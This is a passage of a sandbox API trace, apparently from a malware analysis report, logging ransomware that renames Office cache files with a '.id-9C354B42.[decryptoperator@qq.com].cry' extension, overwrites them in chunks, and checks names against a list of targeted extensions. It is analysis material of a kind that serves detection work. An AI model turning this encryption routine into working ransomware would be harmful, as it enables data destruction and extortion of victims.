lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0043.143] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0043.144] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.144] ReadFile (in: hFile=0x1ac, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.166] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.166] ReadFile (in: hFile=0x1ac, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.206] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0043.206] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.206] ReadFile (in: hFile=0x1ac, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.403] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.404] WriteFile (in: hFile=0x1ac, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0043.418] SetEndOfFile (hFile=0x1ac) returned 1 [0043.418] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0043.439] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.439] WriteFile (in: hFile=0x1ac, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.441] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.441] WriteFile (in: hFile=0x1ac, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.445] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.445] WriteFile (in: hFile=0x1ac, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.447] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0043.447] CloseHandle (hObject=0x1ac) returned 1 [0043.907] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0043.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0043.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0043.908] lstrlenW (lpString=".doc") returned 4 [0043.908] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.908] lstrlenW (lpString=".docx") returned 5 [0043.908] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0043.908] lstrlenW (lpString=".pdf") returned 4 [0043.908] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.908] lstrlenW (lpString=".xls") returned 4 [0043.908] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.908] lstrlenW (lpString=".xlsx") returned 5 [0043.908] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0043.908] lstrlenW (lpString=".ppt") returned 4 [0043.908] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0043.908] lstrlenW (lpString=".zip") returned 4 [0043.908] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.908] lstrlenW (lpString=".rar") returned 4 [0043.908] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.908] lstrlenW (lpString=".bz2") returned 4 [0043.908] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.908] lstrlenW (lpString=".7z") returned 3 [0043.908] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0043.908] lstrlenW (lpString=".dbf") returned 4 [0043.908] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0043.908] lstrlenW (lpString=".1cd") returned 4 [0043.908] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0043.908] lstrlenW (lpString=".jpg") returned 4 [0043.908] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0043.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0043.908] lstrlenW (lpString=".doc") returned 4 [0043.909] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.909] lstrlenW (lpString=".docx") returned 5 [0043.909] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0043.909] lstrlenW (lpString=".pdf") returned 4 [0043.909] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.909] lstrlenW (lpString=".xls") returned 4 [0043.909] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.909] lstrlenW (lpString=".xlsx") returned 5 [0043.909] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0043.909] lstrlenW (lpString=".ppt") returned 4 [0043.909] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0043.909] lstrlenW (lpString=".zip") returned 4 [0043.909] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.909] lstrlenW (lpString=".rar") returned 4 [0043.909] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.909] lstrlenW (lpString=".bz2") returned 4 [0043.909] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.909] lstrlenW (lpString=".7z") returned 3 [0043.909] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0043.909] lstrlenW (lpString=".dbf") returned 4 [0043.909] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0043.909] lstrlenW (lpString=".1cd") returned 4 [0043.909] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0043.909] lstrlenW (lpString=".jpg") returned 4 [0043.909] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.909] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0043.909] lstrlenW (lpString="VisioMUI.msi") returned 12 [0043.909] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0043.911] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=2797568) returned 1 [0043.911] CloseHandle (hObject=0x1ac) returned 1 [0043.911] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi")) returned 0x2020 [0043.911] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.911] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0043.919] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0043.926] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0043.926] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.926] ReadFile (in: hFile=0x1ac, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.966] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.966] ReadFile (in: hFile=0x1ac, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.001] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.001] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.001] ReadFile (in: hFile=0x1ac, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.028] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.028] WriteFile (in: hFile=0x1ac, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0044.046] SetEndOfFile (hFile=0x1ac) returned 1 [0044.046] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0044.046] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.047] WriteFile (in: hFile=0x1ac, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.220] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.220] WriteFile (in: hFile=0x1ac, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.224] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.224] WriteFile (in: hFile=0x1ac, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.226] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0044.226] CloseHandle (hObject=0x1ac) returned 1 [0044.226] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0044.226] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0044.226] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0044.227] lstrlenW (lpString=".doc") returned 4 [0044.227] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.227] lstrlenW (lpString=".docx") returned 5 [0044.227] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.227] lstrlenW (lpString=".pdf") returned 4 [0044.227] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.227] lstrlenW (lpString=".xls") returned 4 [0044.227] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.227] lstrlenW (lpString=".xlsx") returned 5 [0044.227] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.227] lstrlenW (lpString=".ppt") returned 4 [0044.227] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.227] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0044.227] lstrlenW (lpString=".zip") returned 4 [0044.227] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.227] lstrlenW (lpString=".rar") returned 4 [0044.227] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.227] lstrlenW (lpString=".bz2") returned 4 [0044.227] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.227] lstrlenW (lpString=".7z") returned 3 [0044.227] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.227] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0044.227] lstrlenW (lpString=".dbf") returned 4 [0044.227] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.227] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0044.227] lstrlenW (lpString=".1cd") returned 4 [0044.227] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.227] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0044.227] lstrlenW (lpString=".jpg") returned 4 [0044.227] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.227] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0044.227] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0044.227] lstrlenW (lpString=".doc") returned 4 [0044.227] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.227] lstrlenW (lpString=".docx") returned 5 [0044.227] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.228] lstrlenW (lpString=".pdf") returned 4 [0044.228] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.228] lstrlenW (lpString=".xls") returned 4 [0044.228] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.228] lstrlenW (lpString=".xlsx") returned 5 [0044.228] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.228] lstrlenW (lpString=".ppt") returned 4 [0044.228] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.228] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0044.228] lstrlenW (lpString=".zip") returned 4 [0044.228] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.228] lstrlenW (lpString=".rar") returned 4 [0044.228] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.228] lstrlenW (lpString=".bz2") returned 4 [0044.228] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.228] lstrlenW (lpString=".7z") returned 3 [0044.228] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.228] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0044.228] lstrlenW (lpString=".dbf") returned 4 [0044.228] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.228] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0044.228] lstrlenW (lpString=".1cd") returned 4 [0044.228] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.228] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0044.228] lstrlenW (lpString=".jpg") returned 4 [0044.228] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.228] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0044.228] lstrlenW (lpString="OnoteLR.cab") returned 11 [0044.228] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0044.266] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=17456632) returned 1 [0044.266] CloseHandle (hObject=0x1ac) returned 1 [0044.266] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab")) returned 0x2020 [0044.266] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.267] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0044.267] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0044.267] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.267] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.267] ReadFile (in: hFile=0x1ac, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.309] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.309] ReadFile (in: hFile=0x1ac, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.325] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.325] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.325] ReadFile (in: hFile=0x1ac, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.357] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.357] WriteFile (in: hFile=0x1ac, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0044.374] SetEndOfFile (hFile=0x1ac) returned 1 [0044.374] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0044.506] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.506] WriteFile (in: hFile=0x1ac, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.507] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.507] WriteFile (in: hFile=0x1ac, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.507] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.507] WriteFile (in: hFile=0x1ac, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.509] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0044.509] CloseHandle (hObject=0x1ac) returned 1 [0044.509] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0044.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0044.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0044.510] lstrlenW (lpString=".doc") returned 4 [0044.510] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.510] lstrlenW (lpString=".docx") returned 5 [0044.510] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.510] lstrlenW (lpString=".pdf") returned 4 [0044.510] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.510] lstrlenW (lpString=".xls") returned 4 [0044.510] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.510] lstrlenW (lpString=".xlsx") returned 5 [0044.510] lstrcmpiW 